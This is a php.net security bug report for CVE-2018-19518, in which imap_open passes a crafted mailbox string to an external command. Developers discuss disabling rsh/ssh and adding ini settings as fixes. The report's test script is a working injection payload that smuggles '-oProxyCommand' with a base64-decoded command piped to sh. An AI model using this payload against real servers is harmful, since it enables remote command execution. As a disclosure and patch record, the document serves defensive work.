php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #77153 imap_open allows to run arbitrary shell commands via mailbox parameter
Submitted: 2018-11-14 17:54 UTC Modified: 2019-01-31 23:26 UTC
From: azjezz at protonmail dot com Assigned: stas (profile)
Status: Closed Package: IMAP related
PHP Version: 5.6.38 OS: Debian-like ( debian / ubuntu )
Private report: No CVE-ID: 2018-19518
View Developer Edit
 [2018-11-14 17:54 UTC] azjezz at protonmail dot com 
Description:
------------
Bypassing disabled exec functions in PHP via imap_open (Debian & Ubuntu)

this bug has already been made public : 

- https://antichat.com/threads/463395/#post-4254681
- https://github.com/Bo0oM/PHP_imap_open_exploit

Test script:
---------------
<?php

# echo '1234567890'>/tmp/test0001

// $server = $_POST['server'] ??? 
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-11-14 17:58 UTC] azjezz at protonmail dot com
-Operating System: Debin-like ( debin / ubuntu ) +Operating System: Debian-like ( debian / ubuntu )
 [2018-11-14 17:58 UTC] azjezz at protonmail dot com 
fix typo in os name
 [2018-11-14 18:07 UTC] stas@php.net 
Huh, imap library just runs external commands with no escaping whatsoever? This sucks :(

I guess we need to add some filters there. Not sure whether this ssh/rsh thing is even useful... But we probably could at least filter the hostname.
 [2018-11-14 18:08 UTC] stas@php.net
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
 [2018-11-14 19:11 UTC] stas@php.net 
And mailbox parsing happens inside c-client, so we have no control over it. Looks like we'd have to disassemble the mbox string, validate it and re-assemble it back. Maybe also add /norsh by default.
 [2018-11-15 10:39 UTC] cmb@php.net 
Related To: Bug #77160
 [2018-11-15 15:44 UTC] cmb@php.net 
> Maybe also add /norsh by default.

Iff that would resolve the RCE vulnerability, we may consider
to disable rsh support globally.  From imap.2007f/docs/FAQ.txt:

| You can disable rsh globally by setting the rsh timeout value
| to 0 with the call:
| mail_parameters (NIL,SET_RSHTIMEOUT,0);

Calling this in MINIT[1] *might* be sufficient.

Anyhow, since this issue is already lively discussed in public, I
think we have to hurry up with a solution.

[1] <https://gist.github.com/cmb69/b3ca981599bf21004c6417ab64dea4b7#file-disable-rsh-globally-patch>
 [2018-11-15 19:35 UTC] stas@php.net 
Would this also disable SSH functionality? Because there's also ssh (which seems to be different branch from rsh, though on Debian it's the same thing in fact, but not on other systems) and it may be vulnerable too. 

It is also BC break so we'd probably have to announce it and put it into UPGRADING.
 [2018-11-15 20:00 UTC] stas@php.net 
OK, there's also SET_SSHTIMEOUT, so probably we'd need to do both of them. We may allow a way to enable them back though, in case anybody needs it (doubtful, but who knows?)
 [2018-11-15 20:04 UTC] azjezz at protonmail dot com
-Summary: imap_open allows to run arbitrary shell commands via mailbox parameter +Summary: bypass disabled exec function
 [2018-11-15 20:04 UTC] azjezz at protonmail dot com 
i think maybe adding a `php.ini` directive for it defaulting to 0 should do it.

example :

imap.set_rshtimeout=0
imap.set_sshtimeout=0
 [2018-11-15 20:07 UTC] azjezz at protonmail dot com
-Summary: bypass disabled exec function +Summary: imap_open allows to run arbitrary shell commands via mailbox parameter
 [2018-11-15 20:07 UTC] azjezz at protonmail dot com 
revert summary change
 [2018-11-16 00:16 UTC] cmb@php.net 
Indeed, (a) new ini option(s) might be appropriate for BC reasons.
I think we should reduce these to a minimum (maybe just a boolean
imap.allow_sh).

FTR: not only imap_open() seems to be affected by this issue, but
also imap_createmailbox() and imap_append() and maybe others.
 [2018-11-18 20:57 UTC] stas@php.net
-PHP Version: Irrelevant +PHP Version: 5.6.38
 [2018-11-19 01:13 UTC] stas@php.net 
Proposed patch:

https://gist.github.com/smalyshev/aae34ba0a831e9a5c4824b1ee89579c2

I plan to merge it sometime early next week, if there are no objections, since the issue is already public. It is somewhat of a BC break but I don't think we have a choice here.
 [2018-11-19 01:13 UTC] stas@php.net 
The patch is for 5.6, I'll upmerge it of course.
 [2018-11-19 01:13 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2018-11-19 21:08 UTC] stas@php.net 
Opening it since it's essentially in public anyway.
 [2018-11-20 07:23 UTC] c dot r dot l dot f at yandex dot ru 
Guys this is the same research from #76428 which you totally ignored.
 [2018-11-20 07:27 UTC] c dot r dot l dot f at yandex dot ru 
stas@php.net knew about this from 2018-06-20.
 [2018-11-20 07:44 UTC] stas@php.net 
Yes, I did not realize at the time c-client is essentially a dead project and is not going to be fixed. Now I realize that so it looks like we need to mitigate it in PHP (even though it's not directly a PHP issue).
 [2018-11-20 19:37 UTC] stas@php.net 
Related To: Bug #76428
 [2018-11-20 19:38 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2018-11-21 01:54 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2018-12-03 09:15 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2018-19158
 [2018-12-11 16:42 UTC] anarcat at debian dot org 
CVE-2018-19158 is a typo. mitre actually allocated CVE-2018-19518 instead, see also https://www.openwall.com/lists/oss-security/2018/12/05/2

could some php.net fix the metadata here? I'll request Mitre reserve the erroneous CVE since it's been used in some other places already and should probably be discarded to avoid the confusion.
 [2019-01-31 23:26 UTC] stas@php.net
-CVE-ID: 2018-19158 +CVE-ID: 2018-19518
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Fri Oct 31 03:00:01 2025 UTC